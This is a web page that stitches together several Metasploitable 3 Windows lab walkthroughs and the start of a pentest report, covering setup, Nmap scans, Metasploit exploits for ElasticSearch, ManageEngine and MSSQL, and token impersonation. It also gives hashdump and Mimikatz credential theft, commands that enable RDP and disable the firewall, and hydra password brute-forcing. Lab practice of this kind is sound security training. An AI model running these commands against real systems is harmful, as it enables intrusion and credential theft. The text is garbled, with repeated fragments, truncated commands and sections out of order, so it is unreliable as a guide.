Metasploitable 3 Windows Walkthrough Now
After gaining a session:
getsystem # attempt privilege escalation
hashdump # dump NTLM hashes
load kiwi # load Mimikatz
creds_all # grab plaintext credentials
shell # drop to Windows cmd
Enable RDP remotely:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall set allprofiles state off
# Use vulners script to find known CVEs
nmap --script vulners -sV -p 445,8080,8585,9200 192.168.1.100
| Problem | Solution |
|---------|----------|
| EternalBlue fails | Use auxiliary/scanner/smb/smb_ms17_010 first. Target may need reboot. |
| WinRM access denied | Ensure winrm quickconfig and Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" on target. |
| Jenkins reverse shell no connection | Check Windows firewall – disable it or allow inbound port. |
| Vagrant VM not starting | Increase RAM to 4GB, enable VT-x in BIOS. |
hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.56.102 smb
The password is often vagrant or mcpassword123. (Check the Vagrant build files).
Check SeImpersonatePrivilege etc.
Use Metasploit getsystem – but may fail. Try Potato exploits:
msf6 > use exploit/windows/local/ms16_075_reflection_juicy
Or manually upload and run JuicyPotato.exe.
If you have vagrant:vagrant or administrator:vagrant, you can use WinRM.
# Install evil-winrm
gem install evil-winrm
This walkthrough of Metasploitable 3 Windows demonstrates a critical truth: Complex exploits (EternalBlue) are cool, but simple misconfigurations (WinRM with weak passwords) are how real breaches happen.
We covered:
Metasploitable 3 is harder than its Linux predecessor, but mastering it puts you miles ahead of script kiddies. You now understand not just how to type an exploit, but why Windows networks fall. metasploitable 3 windows walkthrough
Next Steps:
Now, go revert your snapshot and do it again—this time, without looking at the notes.
Metasploitable 3 Windows Walkthrough: A Comprehensive Guide If you are diving into the world of penetration testing, Metasploitable 3 is your ultimate playground. Unlike its predecessor, which was a Linux-only VM, Metasploitable 3 offers a Windows version (typically based on Windows Server 2008 R2) that is intentionally riddled with vulnerabilities.
This walkthrough covers the setup and several key exploitation paths to help you sharpen your Red Team skills. 1. Lab Setup
Before hacking, you need to build the environment. Metasploitable 3 is unique because it is built automatically using Vagrant and Packer.
Install Prerequisites: You’ll need VirtualBox, Vagrant, and the vagrant-vbguest plugin. Build the VM:
mkdir metasploitable3 && cd metasploitable3 vagrant init rapid7/metasploitable3-win2k8 vagrant up Use code with caution.
Networking: Ensure your attacking machine (Kali Linux) is on the same host-only network as the Metasploitable 3 instance. 2. Information Gathering
The first step in any engagement is reconnaissance. Let’s identify the open ports and services. Nmap Scan: nmap -sV -sC -O 192.168.x.x Use code with caution. You will notice a massive attack surface, including: Port 80/443: IIS 7.5 Port 445: SMB Port 1433: MSSQL Port 3306: MySQL Port 9200: Elasticsearch
3. Exploitation Path A: ElasticSearch (Remote Code Execution) After gaining a session: getsystem # attempt privilege
ElasticSearch on Metasploitable 3 is often an older version vulnerable to CVE-2014-3120. This allows for dynamic script execution.
Search for the exploit: In Metasploit, use search elasticsearch. Configure:
use exploit/multi/elasticsearch/script_static_iv_clobber set RHOSTS [Target IP] set LHOST [Your IP] exploit Use code with caution.
Result: You should receive a Meterpreter session running as the user under which ElasticSearch is installed. 4. Exploitation Path B: ManageEngine Desktop Central
Metasploitable 3 hosts an instance of ManageEngine that is vulnerable to a file upload vulnerability (CVE-2015-8249).
Search: use exploit/windows/http/manageengine_connectionid_write. Execute: Set your RHOSTS and RPORT (usually 8020).
Result: This often grants SYSTEM level access immediately, as the service runs with high privileges. 5. Exploitation Path C: Weak Credentials (SMB/MSSQL)
Metasploitable 3 simulates real-world "bad habits," like using default or weak passwords.
SMB: You can use auxiliary/scanner/smb/smb_login with common wordlists.
MSSQL: The sa account often has a weak password. Use exploit/windows/mssql/mssql_payload once you have credentials to gain a shell. 6. Post-Exploitation & Privilege Escalation # Use vulners script to find known CVEs
Once you have a foothold (a standard user shell), your goal is to become NT AUTHORITY\SYSTEM. Local Exploit Suggester:
use post/multi/recon/local_exploit_suggester set SESSION 1 run Use code with caution.
Token Impersonation: If you are an admin but not SYSTEM, use the incognito module in Meterpreter:
use incognito list_tokens -u impersonate_token "NT AUTHORITY\SYSTEM" Use code with caution. 7. The Flags
Metasploitable 3 is designed as a Capture The Flag (CTF) environment. Look for custom icons or text files scattered throughout the system (e.g., on the Administrator's desktop or in the root directory). Each flag represents a successfully compromised service.
Metasploitable 3 Windows serves as a valuable tool for understanding how common misconfigurations and legacy software vulnerabilities can affect a Windows environment. Exploring these pathways provides insight into the importance of regular patching, secure configuration management, and the principle of least privilege.
By identifying these weaknesses in a controlled laboratory setting, security professionals can better develop defensive strategies, improve incident response procedures, and strengthen the overall security posture of production systems.
🛡️ Penetration Testing Report: Metasploitable 3 (Windows) 1. Executive Summary
This assessment details the security posture of the Metasploitable 3 Windows virtual machine. The objective of this exercise was to identify security vulnerabilities, demonstrate exploitation vectors, and provide remediation steps to secure the asset. Multiple high and critical-severity vulnerabilities were identified, including unauthenticated remote code execution and weak credential policies. Target Details: Operating System: Windows Server 2008 R2 (Metasploitable 3) IP Address: 192.168.1.36 (Example IP) Testing Machine: Kali Linux 2. Methodology & Phases
The engagement followed the standard penetration testing execution standard: Reconnaissance & Scanning: Discovering live hosts and open ports. Vulnerability Analysis: Identifying outdated software and weak configurations. Exploitation: Gaining initial access to the system. Privilege Escalation: Elevating standard user access to administrative rights. 3. Detailed Walkthrough 🔍 Phase 1: Scanning & Enumeration
The initial step involved identifying exposed attack surfaces using Nmap. nmap -sV -sC -A Use code with caution. Copied to clipboard
Metasploitable 3 (Windows) Write-up — Part I: FTP (PORT 21)
meterpreter > hashdump
# Or
meterpreter > load kiwi
meterpreter > creds_all